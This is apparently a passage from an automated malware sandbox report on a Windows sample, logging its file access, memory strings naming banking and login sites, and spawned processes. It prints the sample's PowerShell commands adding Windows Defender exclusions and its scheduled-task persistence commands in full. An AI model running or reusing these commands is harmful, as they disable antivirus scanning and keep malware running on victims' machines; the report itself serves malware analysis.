                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: rjgJP5K0B1.51.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                            Source: rjgJP5K0B1.51.drBinary or memory string: discord.comVMware20,11696428655f
                            Source: rjgJP5K0B1.51.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                            Source: rjgJP5K0B1.51.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                            Source: rjgJP5K0B1.51.drBinary or memory string: global block list test formVMware20,11696428655
                            Source: rjgJP5K0B1.51.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                            Source: rjgJP5K0B1.51.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                            Source: rjgJP5K0B1.51.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                            Source: rjgJP5K0B1.51.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                            Source: rjgJP5K0B1.51.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                            Source: rjgJP5K0B1.51.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                            Source: rjgJP5K0B1.51.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                            Source: rjgJP5K0B1.51.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                            Source: rjgJP5K0B1.51.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                            Source: rjgJP5K0B1.51.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                            Source: rjgJP5K0B1.51.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                            Source: rjgJP5K0B1.51.drBinary or memory string: outlook.office.comVMware20,11696428655s
                            Source: rjgJP5K0B1.51.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                            Source: rjgJP5K0B1.51.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                            Source: rjgJP5K0B1.51.drBinary or memory string: AMC password management pageVMware20,11696428655
                            Source: rjgJP5K0B1.51.drBinary or memory string: tasks.office.comVMware20,11696428655o
                            Source: Udzp7lL5ns.exe, 00000000.00000002.2184888271.000000001BA14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: rjgJP5K0B1.51.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                            Source: rjgJP5K0B1.51.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                            Source: rjgJP5K0B1.51.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                            Source: rjgJP5K0B1.51.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                            Source: rjgJP5K0B1.51.drBinary or memory string: dev.azure.comVMware20,11696428655j
                            Source: rjgJP5K0B1.51.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                            Source: rjgJP5K0B1.51.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                            Source: rjgJP5K0B1.51.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                            Source: Udzp7lL5ns.exe, 00000000.00000002.2184888271.000000001B9FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: rjgJP5K0B1.51.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                            Source: rjgJP5K0B1.51.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\Memory Compression.exe'
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe'
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exe'
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe'
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe'
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Udzp7lL5ns.exe'
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Udzp7lL5ns.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rm05dpm5\rm05dpm5.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "LaHYItspByFGQiJUMBgDGadpL" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe'" /rl HIGHEST /fJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Udzp7lL5nsU" /sc MINUTE /mo 12 /tr "'C:\Users\user\Desktop\Udzp7lL5ns.exe'" /fJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Udzp7lL5ns" /sc ONLOGON /tr "'C:\Users\user\Desktop\Udzp7lL5ns.exe'" /rl HIGHEST /fJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Udzp7lL5ns.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\grqPBzywzR.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED84.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2936DBF6B4C2EB0AEC72C42A91573.TMP"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEF49.tmp" "c:\Windows\System32\CSC98778A6FB9344578AD1F444CFDF09EF9.TMP"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Mail\Memory Compression.exe "C:\Program Files (x86)\windows mail\Memory Compression.exe"
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeQueries volume information: C:\Users\user\Desktop\Udzp7lL5ns.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeQueries volume information: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe VolumeInformationJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeQueries volume information: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe VolumeInformationJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeQueries volume information: C:\Program Files (x86)\Windows Mail\Memory Compression.exe VolumeInformation
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeQueries volume information: C:\Program Files (x86)\Windows Mail\Memory Compression.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
